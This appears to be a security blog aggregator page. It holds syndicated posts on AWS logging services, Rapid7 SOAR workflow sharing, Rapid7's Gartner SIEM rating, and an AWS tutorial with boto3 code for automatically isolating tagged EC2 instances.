  • AWS Config monitors and records your AWS resource configurations and allows you to automate the evaluation of recorded configurations against desired configurations. For example, you can use AWS Config to verify that resources are encrypted, multi-factor authentication (MFA) is enabled, and logging is turned on, and you can use AWS Config rules to identify noncompliant resources. Additionally, you can review changes in configurations and relationships between AWS resources and dive into detailed resource configuration histories, helping you to determine when compliance status changed and the reason for the change.
  • Amazon GuardDuty is a threat detection service that continuously monitors for malicious activity and unauthorized behavior to protect your AWS accounts and workloads. Amazon GuardDuty analyzes and processes the following data sources: VPC Flow Logs, AWS CloudTrail management event logs, CloudTrail Amazon Simple Storage Service (Amazon S3) data event logs, and DNS logs. It uses threat intelligence feeds, such as lists of malicious IP addresses and domains, and machine learning to identify potential threats within your AWS environment.
  • AWS Security Hub provides a single place that aggregates, organizes, and prioritizes your security alerts, or findings, from multiple AWS services and optional third-party products to give you a comprehensive view of security alerts and compliance status.
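
For example, the following is a minimal sketch of querying CloudTrail event history with Boto3 to answer the question of who took which action; the user name and time window are placeholders.

from datetime import datetime, timedelta, timezone
import boto3

cloudtrail = boto3.client("cloudtrail")

def recent_events_for_user(username, hours=24):
    """List recent API activity recorded by CloudTrail for one IAM user name."""
    end = datetime.now(timezone.utc)
    start = end - timedelta(hours=hours)
    paginator = cloudtrail.get_paginator("lookup_events")
    pages = paginator.paginate(
        LookupAttributes=[{"AttributeKey": "Username", "AttributeValue": username}],
        StartTime=start,
        EndTime=end,
    )
    for page in pages:
        for event in page["Events"]:
            print(event["EventTime"], event["EventName"], event.get("EventSource"))

recent_events_for_user("example-user")  # placeholder user name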

Be aware that most AWS services, such as AWS WAF, do not charge for enabling logging, but storing the logs will incur ongoing costs. Always consult the AWS service's pricing page to understand cost impacts. Related services, such as Amazon Kinesis Data Firehose (used to stream data to storage services) and Amazon Simple Storage Service (Amazon S3) (used to store log data), will also incur charges.

Turn on service-specific logging as desired

After you have the foundational logging services enabled and configured, next turn your attention to service-specific logging. Many AWS services produce service-specific logs that include additional information. These services can be configured to record and send out information that is necessary to understand their internal state, including application, workload, user activity, dependency, and transaction telemetry. Here’s a sampling of key services with service-specific logging features:

  • Amazon CloudWatch provides you with data and actionable insights to monitor your applications, respond to system-wide performance changes, optimize resource utilization, and get a unified view of operational health. CloudWatch collects monitoring and operational data in the form of logs, metrics, and events, providing you with a unified view of AWS resources, applications, and services that run on AWS and on-premises servers. You can gain additional operational insights from your AWS compute instances (Amazon Elastic Compute Cloud, or EC2) as well as on-premises servers using the CloudWatch agent. Additionally, you can use CloudWatch to detect anomalous behavior in your environments, set alarms, visualize logs and metrics side by side, take automated actions, troubleshoot issues, and discover insights to keep your applications running smoothly.
  • Amazon CloudWatch Logs is a component of Amazon CloudWatch that you can use to monitor, store, and access your log files from Amazon Elastic Compute Cloud (Amazon EC2) instances, AWS CloudTrail, Route 53, and other sources. CloudWatch Logs enables you to centralize the logs from all of your systems, applications, and AWS services in a single, highly scalable service. You can then easily view them, search them for specific error codes or patterns, filter them based on specific fields, or archive them securely for future analysis. CloudWatch Logs presents all of your logs, regardless of their source, as a single, consistent flow of events ordered by time. You can query and sort them on other dimensions, group them by specific fields, create custom computations with a powerful query language, and visualize log data in dashboards.
  • Traffic Mirroring allows you to achieve full packet capture (as well as filtered subsets) of network traffic from an elastic network interface of EC2 instances inside your VPC. You can then send the captured traffic to out-of-band security and monitoring appliances for content inspection, threat monitoring, and troubleshooting.
  • The Elastic Load Balancing service provides access logs that capture detailed information about requests that are sent to your load balancer. Each log contains information such as the time the request was received, the client's IP address, latencies, request paths, and server responses. The specific information logged varies by load balancer type.
  • Amazon S3 access logs record the S3 bucket and account that are being accessed, the API action, and requester information (see the example that follows this list).
  • AWS Web Application Firewall (WAF) logs record web requests that are processed by AWS WAF, and indicate whether the requests matched AWS WAF rules and what actions, if any, were taken. These logs are delivered to Amazon S3 by using Amazon Kinesis Data Firehose.
  • Amazon Relational Database Service (Amazon RDS) log files can be downloaded or published to Amazon CloudWatch Logs. Log settings are specific to each database engine; agencies use these settings to apply their desired logging configurations and choose which events are logged. Amazon Aurora and Amazon RDS for Oracle also support a real-time logging feature called database activity streams, which provides even more detail and cannot be accessed or modified by database administrators.
  • Amazon Route 53 provides options for logging both public DNS query requests and Route 53 Resolver DNS queries:
    • Route 53 Resolver DNS query logs record DNS queries and responses that originate from your VPC, that use an inbound Resolver endpoint, that use an outbound Resolver endpoint, or that use a Route 53 Resolver DNS Firewall.
    • Route 53 DNS public query logs record queries to Route 53 for domains you have hosted with AWS, including the domain or subdomain that was requested; the date and time of the request; the DNS record type; the Route 53 edge location that responded to the DNS query; and the DNS response code.
  • Amazon Elastic Compute Cloud (Amazon EC2) instances can use the unified CloudWatch agent to collect logs and metrics from Linux, macOS, and Windows EC2 instances and publish them to the Amazon CloudWatch service.
  • Elastic Beanstalk logs can be streamed to CloudWatch Logs. You can also use the AWS Management Console to request the last 100 log entries from the web and application servers, or request a bundle of all log files that is uploaded to Amazon S3 as a ZIP file.
  • Amazon CloudFront logs record user requests for content that is cached by CloudFront.
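
As a concrete example of the Amazon S3 access logging called out above, the following boto3 sketch turns on server access logging for a bucket and delivers the records to a separate logging bucket. The bucket names are placeholders, and the target bucket must already exist and allow the S3 log delivery service to write to it.

import boto3

s3 = boto3.client('s3')

# Hypothetical bucket names for illustration only
SOURCE_BUCKET = 'example-application-data'
LOG_BUCKET = 'example-central-access-logs'

# Enable server access logging on the source bucket; log objects are written
# to the target bucket under the given prefix
s3.put_bucket_logging(
    Bucket=SOURCE_BUCKET,
    BucketLoggingStatus={
        'LoggingEnabled': {
            'TargetBucket': LOG_BUCKET,
            'TargetPrefix': 'access-logs/example-application-data/',
        }
    },
)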

Store and analyze log data

Now that you’ve enabled foundational and service-specific logging in your AWS accounts, that data needs to be persisted and managed throughout its lifecycle. AWS offers a variety of solutions and services to consolidate your log data and store it, secure access to it, and perform analytics.

Store log data

The primary service for storing all of this logging data is Amazon S3. Amazon S3 is ideal for this role, because it’s a highly scalable, highly resilient object storage service. AWS provides a rich set of multi-layered capabilities to secure log data that is stored in Amazon S3, including encrypting objects (log records), preventing deletion (the S3 Object Lock feature), and using lifecycle policies to transition data to lower-cost storage over time (for example, to S3 Glacier). Access to data in Amazon S3 can also be restricted through AWS Identity and Access Management (IAM) policies, AWS Organizations service control policies (SCPs), S3 bucket policies, Amazon S3 Access Points, and AWS PrivateLink interfaces. While S3 is particularly easy to use with other AWS services given its various integrations, many customers also centralize their storage and analysis of their on-premises log data, or log data from other cloud environments, on AWS using S3 and the analytic features described below.
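
To illustrate the lifecycle management described above, the following boto3 sketch applies a lifecycle rule to a log bucket that transitions objects to S3 Glacier after 90 days and expires them after roughly seven years. The bucket name and retention values are examples only; align them with your organization's retention requirements.

import boto3

s3 = boto3.client('s3')

LOG_BUCKET = 'example-central-access-logs'  # hypothetical log archive bucket

# Transition log objects to lower-cost storage after 90 days and expire them
# after 2,555 days (about 7 years) -- adjust to your retention requirements
s3.put_bucket_lifecycle_configuration(
    Bucket=LOG_BUCKET,
    LifecycleConfiguration={
        'Rules': [
            {
                'ID': 'archive-then-expire-logs',
                'Status': 'Enabled',
                'Filter': {'Prefix': ''},  # apply to every object in the bucket
                'Transitions': [{'Days': 90, 'StorageClass': 'GLACIER'}],
                'Expiration': {'Days': 2555},
            }
        ]
    },
)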

If your AWS accounts are organized in a multi-account architecture, you can make use of the AWS Centralized Logging solution. This solution enables organizations to collect, analyze, and display CloudWatch Logs data in a single dashboard. AWS services generate log data, such as audit logs for access, configuration changes, and billing events. In addition, web servers, applications, and operating systems all generate log files in various formats. This solution uses the Amazon Elasticsearch Service (Amazon ES) and Kibana to deploy a centralized logging solution that provides a unified view of all the log events. In combination with other AWS-managed services, this solution provides you with a turnkey environment to begin logging and analyzing your AWS environment and applications.

You can also make use of services such as Amazon Kinesis Data Firehose, which you can use to transport log information to S3, Amazon ES, or any third-party service that is provided with an HTTP endpoint, such as Datadog, New Relic, or Splunk.
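
If you deliver logs this way, a Kinesis Data Firehose delivery stream with an S3 destination can be created with a single API call. The following boto3 sketch is illustrative only; the role and bucket ARNs are placeholders, and the role must allow Firehose to write to the bucket.

import boto3

firehose = boto3.client('firehose')

# Hypothetical ARNs for illustration only
DELIVERY_ROLE_ARN = 'arn:aws:iam::111122223333:role/FirehoseToS3'
LOG_BUCKET_ARN = 'arn:aws:s3:::example-central-access-logs'

# Create a delivery stream that buffers incoming log records and writes
# compressed batches to the central log bucket
firehose.create_delivery_stream(
    DeliveryStreamName='central-log-delivery',
    DeliveryStreamType='DirectPut',
    ExtendedS3DestinationConfiguration={
        'RoleARN': DELIVERY_ROLE_ARN,
        'BucketARN': LOG_BUCKET_ARN,
        'Prefix': 'firehose/',
        'BufferingHints': {'SizeInMBs': 5, 'IntervalInSeconds': 300},
        'CompressionFormat': 'GZIP',
    },
)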

Finally, you can use Amazon EventBridge to route and integrate event data between AWS services and to third-party solutions such as software as a service (SaaS) providers or help desk ticketing systems. EventBridge is a serverless event bus service that allows you to connect your applications with data from a variety of sources. EventBridge delivers a stream of real-time data from your own applications, SaaS applications, and AWS services, and then routes that data to targets such as AWS Lambda.
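
For example, the following boto3 sketch creates an EventBridge rule that matches Amazon GuardDuty findings and routes them to a Lambda function for automated triage. The function ARN is hypothetical, and the function's resource policy must also allow EventBridge to invoke it.

import boto3
import json

events = boto3.client('events')

# Hypothetical target function for illustration only
TARGET_LAMBDA_ARN = 'arn:aws:lambda:us-east-1:111122223333:function:triage-findings'

# Match GuardDuty findings published to the default event bus
events.put_rule(
    Name='route-guardduty-findings',
    EventPattern=json.dumps({
        'source': ['aws.guardduty'],
        'detail-type': ['GuardDuty Finding'],
    }),
    State='ENABLED',
)

# Send matching events to the triage function
events.put_targets(
    Rule='route-guardduty-findings',
    Targets=[{'Id': 'triage-lambda', 'Arn': TARGET_LAMBDA_ARN}],
)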

Analyze log data and respond to incidents

As the final step in managing your log data, you can use AWS services such as Amazon Detective, Amazon ES, CloudWatch Logs Insights, and Amazon Athena to analyze your log data and gain operational insights.

  • Amazon Detective makes it easy to analyze, investigate, and quickly identify the root cause of security findings or suspicious activities. Detective automatically collects log data from your AWS resources. It then uses machine learning, statistical analysis, and graph theory to help you visualize and conduct faster and more efficient security investigations.
  • Incident Manager is a component of AWS Systems Manager that enables you to automatically take action when a critical issue is detected by an Amazon CloudWatch alarm or Amazon EventBridge event. Incident Manager runs preconfigured response plans to engage responders via SMS and phone calls, enable chat commands and notifications using AWS Chatbot, and run AWS Systems Manager Automation runbooks. The Incident Manager console integrates with AWS Systems Manager OpsCenter to help you track incidents and post-incident action items from a central place that also synchronizes with popular third-party incident management tools such as Jira Service Desk and ServiceNow.
  • Amazon Elasticsearch Service (Amazon ES) is a fully managed service that collects, indexes, and unifies logs and metrics across your environment to give you unprecedented visibility into your applications and infrastructure. With Amazon ES, you get the scalability, flexibility, and security you need for the most demanding log analytics workloads. You can configure a CloudWatch Logs log group to stream data it receives to your Amazon ES cluster in near real time through a CloudWatch Logs subscription.
  • CloudWatch Logs Insights enables you to interactively search and analyze your log data in CloudWatch Logs.
  • Amazon Athena is an interactive query service that you can use to analyze data in Amazon S3 by using standard SQL. Athena is serverless, so there is no infrastructure to manage, and you pay only for the queries that you run. An example query against CloudTrail logs follows this list.
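
The following boto3 sketch shows what such a query might look like against a CloudTrail table. It assumes you have already created a table over your CloudTrail bucket (here called cloudtrail_logs, in a database called security_logs); the table, database, and output location are placeholders.

import boto3

athena = boto3.client('athena')

# Hypothetical query: review the 20 most recent console logins
QUERY = """
SELECT useridentity.arn, sourceipaddress, eventtime
FROM cloudtrail_logs
WHERE eventname = 'ConsoleLogin'
ORDER BY eventtime DESC
LIMIT 20
"""

response = athena.start_query_execution(
    QueryString=QUERY,
    QueryExecutionContext={'Database': 'security_logs'},
    ResultConfiguration={'OutputLocation': 's3://example-athena-results/'},
)

# Poll get_query_execution / get_query_results with this ID to retrieve results
print(response['QueryExecutionId'])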

Conclusion

As called out in the executive order, information from network and systems logs is invaluable for both investigation and remediation services. AWS provides a broad set of services to collect an unprecedented amount of data at very low cost, optionally store it for long periods of time in tiered storage, and analyze that telemetry information from your cloud-based workloads. These insights will help you improve your organization’s security posture and operational readiness and, as a result, improve your organization’s ability to deliver on its mission.

Next steps

To learn more about how AWS can help you meet the requirements of the executive order, see the other post in this series.

If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Derek Doerr

Derek is a Senior Solutions Architect with the Public Sector team at AWS. He has been working with AWS technology for over four years. Specializing in enterprise management and governance, he is passionate about helping AWS customers navigate their journeys to the cloud. In his free time, he enjoys time with family and friends, as well as scuba diving.

Energize Your Incident Response and Vulnerability Management With Crowdsourced Automation Workflows

Post Syndicated from Matthew Gardiner original https://blog.rapid7.com/2021/08/13/energize-your-incident-response-and-vulnerability-management-with-crowdsourced-automation-workflows/


It’s no secret that most organizations need to dramatically improve their incident detection and response and vulnerability management (VM) programs. How many major security breaches could organizations avert if they could detect and address them at the start, when they’re still just minor incidents?

Industry statistics show that actual mean-time-to-responses (MTTRs) for security incidents are very slow — measured in days, weeks, or more, not the minutes or hours necessary to dramatically reduce the risk of a significant breach. In fact, IBM’s Cost of a Data Breach report found that it took organizations an average of 207 days to detect, let alone address, cybersecurity incidents in 2020. Not surprisingly, in countless security breach retrospectives, the excessive exposure windows leading up to breaches are often found to be key contributors to the ultimate blast radii of these events.

SOAR to a better response

But what causes this excessive exposure? This depends on the organization and certainly can’t be attributed to any one thing, but practically every organization has too many security alerts and software vulnerabilities and not enough people or time to investigate or appropriately respond to them all.

So, what is the answer? More people? This is typically unrealistic, as candidates are hard to find and expensive once you do find them. Reduce the number of alerts? Sure, but which ones? If they require an investigation to differentiate false positives from true breaches, which alerts should you turn off?

Clearly a key part of the answer is to automate as much of the incident response and VM processes as possible. If you can respond to some of the alerts and vulnerabilities completely (or mostly) automatically, all the better!

This is what security orchestration, automation, and response (SOAR) systems, such as Rapid7’s InsightConnect, were created to do. But a SOAR platform on its own doesn’t solve the automation problem — it is just a platform, after all. Organizations also need the applications that run in and bring the SOAR platform to life. Sometimes called playbooks or workflows, these applications deliver the data, decisioning, integration, and communication necessary to automate incident response, as well as the processes necessary to prioritize and patch vulnerabilities.

But like the problem of rebuilding a plane while simultaneously flying it, how does a slammed IR, SOC, or VM team find the time to create these automation applications while continuing to address the issues that are continuously rolling in?

Strength in numbers: The power of crowdsourcing workflows

Increasingly, we believe the answer lies in crowdsourcing workflows from the SOAR product's user community.

One of the key values of SOAR platforms is that they’re in effect specialized security communities with which users can share, customize, and run incident response, VM, and other types of workflows. With InsightConnect, users can pull integrations and incident response and VM workflows from the Extension Library and apply them quickly and easily to the specific needs of the organization. But what really makes this library great is the current and future applications — workflows — that you can find and check out.

Building on the hundreds of existing workflows contributed by Rapid7’s security experts, SOC analysts, and incident responders, we’ve recently taken the Extension Library to the next level by opening it up to submissions from customers and partners. Recently, we released our Contribute an Extension online process. This highly curated workflow submission system enables Rapid7 customers and partners to safely share their favorite workflows with the community.

In the spirit of open source software, Rapid7 acts as the curator of these submissions and vets them for privacy, security, and basic utility. We believe this expanded Extension Library experience will help organizations energize their incident response and VM programs and, by applying best practices and automation, reduce the likelihood of experiencing a major security incident.

The variety of potential automation applications is limited only by the community’s imagination — they aren’t even limited to pure incident response or VM automations. Any process that security teams perform repetitively and largely manually is an excellent candidate for automation. Most security teams could certainly do with some help energizing — and some fresh insights from fellow practitioners might just be the spark they need.


Once Again, Rapid7 Named a Leader in 2021 Gartner Magic Quadrant for SIEM

Post Syndicated from Meaghan Donlon original https://blog.rapid7.com/2021/07/06/once-again-rapid7-named-a-leader-in-2021-gartner-magic-quadrant-for-siem/

Rapid7 is elated for InsightIDR to be recognized as a Leader in the 2021 Gartner Magic Quadrant for Security Information and Event Management (SIEM).


This is the second consecutive time our SaaS SIEM—InsightIDR—has been named a Leader in this report. Access the full complimentary report from us here.

The Gartner Magic Quadrant reports provide a matrix for evaluating technology vendors in a given space. The framework looks at vendors on two axes: completeness of vision and ability to execute. In the case of SIEM, “Gartner defines the security and information event management (SIEM) market by the customer’s need to analyze event data in real time for early detection of targeted attacks and data breaches, and to collect, store, investigate and report on log data for incident response, forensics and regulatory compliance.”

As the detection and response market becomes more competitive, and the demands and challenges of this space grow more complex, we are honored to be recognized as one of the six Leaders named in the 2021 Magic Quadrant for SIEM. We believe we are recognized for our usability and customer experience, as these are areas we’ve invested heavily in and see as critical to the success of today’s detection and response programs.

"This Product has surpassed expectations" – Security Analyst, Energies and Utlities ★★★★★

Thank you

First and foremost, we want to thank our Rapid7 InsightIDR customers and partners for being on this journey with us. Your ongoing feedback, partnership, and trust have fueled our innovation and uncompromising commitment to delivering sophisticated security outcomes that are accessible to all.

Access the full 2021 Gartner Magic Quadrant report here.

Accelerated change escalates challenges around modern detection and response

The last year has brought a swell of change for many organizations, including rapid cloud adoption, increased use of web applications, a significant shift to remote working, and new threats brought on by attackers exploiting circumstances around the pandemic. While these challenges weren’t new, their increased urgency highlighted cracks in an already fragile security ecosystem:

  • Increased cybersecurity demands widened the already growing skills gap
  • Uptime trumped security, often leaving SecOps professionals scrambling to keep up
  • The combination of these stresses drove many teams to a breaking point with alert fatigue

These market dynamics prompted a lot of Security Operations Center (SOC) teams to reevaluate current processes and systems, and push for change.

Rapid7 InsightIDR helps teams focus on what matters most to drive effective threat detection and response across modern IT environments

Our approach to detection and response has always been directed by what we hear from customers. This includes industry engagement and insights gathered through Rapid7’s research and open source communities, our firsthand experience with Rapid7 MDR (Managed Detection and Response) and services engagements, and of course, direct customer feedback. These collective learnings have enabled us to deeply understand the challenges facing SOC teams today, and pushed us to develop innovative solutions to anticipate and address their needs.

Rapid7 InsightIDR is not another log-aggregation-focused SIEM that sits on the shelf, or one that leaves the difficult and tedious work for security analysts to figure out on their own. Rather, our focus has always been to provide immediate, actionable insights and alerts that teams can feel confident responding to so they can extinguish threats quickly. With Rapid7 InsightIDR, security analysts are no longer fighting just to keep up. They’re empowered to scale and transform their security programs, however and wherever their environments evolve.

We are thrilled about this recognition, but like everything in cybersecurity, what’s most exciting is what happens next. We are committed to continually raising the bar and making it easier for SOC teams to accelerate their detection and response programs, while removing the distractions and noise that get in the way. Thank you again to our customers and partners for joining this journey with us. And stay tuned for more updates ahead soon!

"InsightIDR is my favorite SIEM because the preloaded detections for attacker tactics and techniques. The threat community within the platform is always providing new detections for IOCs. The team is always pleasant to work with, and I love all the feature updates we received this year!" – Information Security Engineer ★★★★★

Access the full 2021 Gartner Magic Quadrant report here.

This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Rapid7.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. Gartner Magic Quadrant for Security Information and Event Management (SIEM), Kelly Kavanagh, Toby Bussa, John Collins, 29 June 2021.

Automate Amazon EC2 instance isolation by using tags

Post Syndicated from Jose Obando original https://aws.amazon.com/blogs/security/automate-amazon-ec2-instance-isolation-by-using-tags/

Containment is a crucial part of an overall incident response strategy, because it gives responders time to perform forensics, eradication, and recovery during an incident. There are many different approaches to containment. In this post, we will be focusing on isolation—the ability to keep multiple targets separated so that each target only sees and affects itself—as a containment strategy.

I’ll show you how to automate isolation of an Amazon Elastic Compute Cloud (Amazon EC2) instance by using an AWS Lambda function that’s triggered by tag changes on the instance, as reported by Amazon CloudWatch Events.

CloudWatch Event Rules deliver a near real-time stream of system events that describe changes in Amazon Web Services (AWS) resources. See also Amazon EventBridge.

Preparing for an incident is important as outlined in the Security Pillar of the AWS Well-Architected Framework.

Out of the 7 Design Principles for Security in the Cloud, as per the Well-Architected Framework, this solution will cover the following:

  • Enable traceability: Monitor, alert, and audit actions and changes to your environment in real time. Integrate log and metric collection with systems to automatically investigate and take action.
  • Automate security best practices: Automated software-based security mechanisms can improve your ability to securely scale more rapidly and cost-effectively. Create secure architectures, including through the implementation of controls that can be defined and managed by AWS as code in version-controlled templates.
  • Prepare for security events: Prepare for an incident by implementing incident management and investigation policy and processes that align to your organizational requirements. Run incident response simulations and use tools with automation to help increase your speed for detection, investigation, and recovery.

After detecting an event in the Detection phase and analyzing in the Analysis phase, you can automate the process of logically isolating an instance from a Virtual Private Cloud (VPC) in Amazon Web Services (AWS).

In this blog post, I describe how to automate EC2 instance isolation by using the tagging feature that a responder can use to identify instances that need to be isolated. A Lambda function then uses AWS API calls to isolate the instances by performing the actions described in the following sections.

Use cases

Your organization can use automated EC2 instance isolation for scenarios like these:

  • A security analyst wants to automate EC2 instance isolation in order to respond to security events in a timely manner.
  • A security manager wants to provide their first responders with a way to quickly react to security incidents without providing too much access to higher security features.

High-level architecture and design

The example solution in this blog post uses a CloudWatch Events rule to trigger a Lambda function. The CloudWatch Events rule is triggered when a tag is applied to an EC2 instance. The Lambda code triggers further actions based on the contents of the event. Note that the CloudFormation template includes the appropriate permissions to run the function.
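
As a rough sketch, a tag-change rule of this kind could be expressed with an event pattern like the following. The deployed CloudFormation stack creates its own rule; the rule name and tag key shown here are hypothetical.

import boto3
import json

events = boto3.client('events')

# Match tag changes on EC2 instances where the (example) isolation tag key changed
TAG_CHANGE_PATTERN = {
    'source': ['aws.tag'],
    'detail-type': ['Tag Change on Resource'],
    'detail': {
        'service': ['ec2'],
        'resource-type': ['instance'],
        'changed-tag-keys': ['SecurityIsolation'],
    },
}

events.put_rule(
    Name='ec2-isolation-tag-change',
    EventPattern=json.dumps(TAG_CHANGE_PATTERN),
    State='ENABLED',
)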

The event flow is shown in Figure 1 and works as follows:

  1. The EC2 instance is tagged.
  2. The CloudWatch Events rule filters the event.
  3. The Lambda function is invoked.
  4. If the criteria are met, the isolation workflow begins.

When the Lambda function is invoked and the criteria are met, these actions are performed:

  1. Checks for IAM instance profile associations.
  2. If the instance is associated to a role, the Lambda function disassociates that role.
  3. Applies the isolation role that you defined during CloudFormation stack creation.
  4. Checks the VPC where the EC2 instance resides.
    • If there is no isolation security group in the VPC (if the VPC is new, for example), the function creates one.
  5. Applies the isolation security group.

Note: If you had a security group with an open (0.0.0.0/0) outbound rule, and you apply this Isolation security group, your existing SSH connections to the instance are immediately dropped. On the other hand, if you have a narrower inbound rule that initially allows the SSH connection, the existing connection will not be broken by changing the group. This is known as Connection Tracking.

Figure 1: High-level diagram showing event flow

For the deployment method, we will be using an AWS CloudFormation Template. AWS CloudFormation gives you an easy way to model a collection of related AWS and third-party resources, provision them quickly and consistently, and manage them throughout their lifecycles, by treating infrastructure as code.

The AWS CloudFormation template that I provide here deploys the following resources:

  • An EC2 instance role for isolation – this is attached to the EC2 instance to prevent further communication with other AWS services, thus limiting the attack surface to your overall infrastructure.
  • An Amazon CloudWatch Events rule – this is used to detect changes to an EC2 resource, in this case a tag change event. We use this as the trigger for the Lambda function.
  • An AWS Identity and Access Management (IAM) role for the Lambda function – this is what the Lambda function uses to run the workflow.
  • A Lambda function for automation – this function contains all of the decision logic; once triggered, it follows the set of steps described in the following section.
  • Lambda function permissions – these allow the CloudWatch Events rule to invoke the Lambda function.
  • An IAM instance profile – this is a container for an IAM role that you can use to pass role information to an EC2 instance.

Supporting functions within the Lambda function

Let’s dive deeper into each supporting function inside the Lambda code.

The following function identifies the virtual private cloud (VPC) ID for a given instance. This is needed to identify which security groups are present in the VPC.

# Look up the VPC ID for a given instance. ec2Client is assumed to be a
# boto3 EC2 client created at module level, for example:
# ec2Client = boto3.client('ec2')
def identifyInstanceVpcId(instanceId):
    instanceReservations = ec2Client.describe_instances(InstanceIds=[instanceId])['Reservations']
    for instanceReservation in instanceReservations:
        instancesDescription = instanceReservation['Instances']
        for instance in instancesDescription:
            # Return the VPC ID of the first (and only) matching instance
            return instance['VpcId']

The following function modifies the security group of an EC2 instance.

# Replace all security groups currently attached to the instance with the
# single isolation security group
def modifyInstanceAttribute(instanceId,securityGroupId):
    response = ec2Client.modify_instance_attribute(
        Groups=[securityGroupId],
        InstanceId=instanceId)

The following function creates a security group on a VPC that blocks all egress access to the security group.

# Create an isolation security group in the given VPC. A new security group
# has no inbound rules by default; revoking the default egress rule also
# blocks all outbound traffic.
def createSecurityGroup(groupName, descriptionString, vpcId):
    resource = boto3.resource('ec2')
    securityGroupId = resource.create_security_group(GroupName=groupName, Description=descriptionString, VpcId=vpcId)
    securityGroupId.revoke_egress(IpPermissions= [{'IpProtocol': '-1','IpRanges': [{'CidrIp': '0.0.0.0/0'}],'Ipv6Ranges': [],'PrefixListIds': [],'UserIdGroupPairs': []}])
    return securityGroupId
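
To show how these supporting functions might fit together, here is a minimal, hypothetical handler sketch. It is not the exact function deployed by the CloudFormation template; the tag key, tag value, and profile and group names are placeholders, and error handling is omitted for brevity.

import boto3

ec2Client = boto3.client('ec2')

ISOLATION_TAG_KEY = 'SecurityIsolation'      # example tag key from the stack parameters
ISOLATION_TAG_VALUE = 'true'                 # example tag value
ISOLATION_GROUP_NAME = 'IsolationSecurityGroup'

def lambda_handler(event, context):
    # The tag-change event carries the instance ARN and its current tags
    instanceId = event['resources'][0].split('/')[-1]
    tags = event['detail']['tags']

    # Only act when the isolation tag is present with the expected value
    if tags.get(ISOLATION_TAG_KEY) != ISOLATION_TAG_VALUE:
        return

    # Remove any IAM instance profile currently associated with the instance
    associations = ec2Client.describe_iam_instance_profile_associations(
        Filters=[{'Name': 'instance-id', 'Values': [instanceId]}])['IamInstanceProfileAssociations']
    for association in associations:
        ec2Client.disassociate_iam_instance_profile(AssociationId=association['AssociationId'])

    # Attach the isolation instance profile created by the stack (name is a placeholder)
    ec2Client.associate_iam_instance_profile(
        IamInstanceProfile={'Name': 'RootInstanceProfile'},
        InstanceId=instanceId)

    # Find (or create) the isolation security group in the instance's VPC
    vpcId = identifyInstanceVpcId(instanceId)
    groups = ec2Client.describe_security_groups(
        Filters=[{'Name': 'group-name', 'Values': [ISOLATION_GROUP_NAME]},
                 {'Name': 'vpc-id', 'Values': [vpcId]}])['SecurityGroups']
    if groups:
        isolationGroupId = groups[0]['GroupId']
    else:
        isolationGroupId = createSecurityGroup(ISOLATION_GROUP_NAME, 'Isolation security group', vpcId).id

    # Replace the instance's security groups with the isolation security group
    modifyInstanceAttribute(instanceId, isolationGroupId)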

Deploy the solution

To deploy the solution provided in this blog post, first download the CloudFormation template, and then set up a CloudFormation stack that specifies the tags that are used to trigger the automated process.

Download the CloudFormation template

To get started, download the CloudFormation template from Amazon S3. Alternatively, you can launch the CloudFormation template by selecting the following Launch Stack button:

Select the Launch Stack button to launch the template

Deploy the CloudFormation stack

Start by uploading the CloudFormation template to your AWS account.

To upload the template

  1. From the AWS Management Console, open the CloudFormation console.
  2. Choose Create Stack.
  3. Choose With new resources (standard).
  4. Choose Upload a template file.
  5. Select Choose File, and then select the YAML file that you just downloaded.
Figure 2: CloudFormation stack creation

Specify stack details

You can leave the default values for the stack as long as there aren’t any resources already provisioned with the same name, such as an IAM role. For example, if you keep the default values, an IAM role named “SecurityIsolation-IAMRole” will be created. Otherwise, the naming convention is fully customizable from this screen, and you can enter your choice of name for the CloudFormation stack and modify the parameters as you see fit. Figure 3 shows the parameters that you can set.

The Evaluation Parameters section defines the tag key and value that will initiate the automated response. Keep in mind that these values are case-sensitive.

Figure 3: CloudFormation stack parameters

Choose Next until you reach the final screen, shown in Figure 4, where you acknowledge that an IAM role is created and you trust the source of this template. Select the check box next to the statement I acknowledge that AWS CloudFormation might create IAM resources with custom names, and then choose Create Stack.

Figure 4: CloudFormation IAM notification

After you complete these steps, the following resources will be provisioned, as shown in Figure 5:

  • EC2IsolationRole
  • EC2TagChangeEvent
  • IAMRoleForLambdaFunction
  • IsolationLambdaFunction
  • IsolationLambdaFunctionInvokePermissions
  • RootInstanceProfile
Figure 5: CloudFormation created resources

Testing

To start the automation, tag an EC2 instance using the tag you defined during the CloudFormation setup. If you’re using the Amazon EC2 console, you can apply tags to resources by using the Tags tab on the relevant resource screen, or you can use the Tags screen, the AWS CLI, or an AWS SDK. A detailed walkthrough for each approach can be found in the Amazon EC2 documentation.

Reverting Changes

If you need to remove the restrictions applied by this workflow, complete the following console steps, or use API calls as shown in the sketch after this list.

  1. From the EC2 dashboard, in the Instances section, check the box next to the instance you want to modify.

    Figure 6: Select the instance to modify

  2. In the top right, select Actions, choose Instance settings, and then choose Modify IAM role.

    Figure 7: Choose Actions > Instance settings > Modify IAM role

  3. Under IAM role, choose the IAM role to attach to your instance, and then select Save.

    Figure 8: Choose the IAM role to attach

  4. Select Actions, choose Networking, and then choose Change security groups.

    Figure 9: Choose Actions > Networking > Change security groups

  5. Under Associated security groups, select Remove and add a different security group with the access you want to grant to this instance.
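
If you prefer to revert these changes programmatically, the following boto3 sketch restores an original instance profile and security group. The instance ID, profile name, and group ID are hypothetical; substitute the values that applied before isolation.

import boto3

ec2 = boto3.client('ec2')

INSTANCE_ID = 'i-0123456789abcdef0'             # hypothetical instance
ORIGINAL_PROFILE = 'MyOriginalInstanceProfile'  # hypothetical instance profile name
ORIGINAL_GROUP_ID = 'sg-0123456789abcdef0'      # hypothetical original security group

# Replace the isolation instance profile with the original one
association = ec2.describe_iam_instance_profile_associations(
    Filters=[{'Name': 'instance-id', 'Values': [INSTANCE_ID]}]
)['IamInstanceProfileAssociations'][0]

ec2.replace_iam_instance_profile_association(
    IamInstanceProfile={'Name': ORIGINAL_PROFILE},
    AssociationId=association['AssociationId'],
)

# Swap the isolation security group back to the original security group(s)
ec2.modify_instance_attribute(
    InstanceId=INSTANCE_ID,
    Groups=[ORIGINAL_GROUP_ID],
)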

Summary

